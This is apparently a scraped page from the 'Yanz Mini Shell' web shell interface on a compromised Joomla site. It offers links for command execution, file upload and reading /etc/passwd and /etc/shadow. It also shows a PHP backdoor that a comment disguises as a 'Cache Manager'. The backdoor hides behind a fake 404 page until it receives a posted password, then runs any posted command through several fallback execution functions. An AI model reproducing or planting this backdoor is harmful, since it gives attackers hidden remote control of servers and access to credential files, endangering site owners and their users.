Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
mnt
web007
c2
12
51900412
htdocs
joomla_01
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php /* Content Delivery Network - Cache Manager v3.2 */ error_reporting(0); $t='316fd44754'; if(!isset($_POST['k'])||$_POST['k']!==$t){ header('HTTP/1.1 404 Not Found'); die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1></body></html>'); } $r=$_POST['c'].' 2>&1'; $o=''; if(function_exists('shell_exec')){$o=@shell_exec($r);} elseif(function_exists('exec')){@exec($r,$a);$o=implode("\n",$a);} elseif(function_exists('system')){ob_start();@system($r);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($r);$o=ob_get_clean();} elseif(function_exists('popen')){$h=@popen($r,'r');$o='';while(!feof($h)){$o.=fread($h,4096);}pclose($h);} echo $o; ?>
Free Space : 3817193472 Byte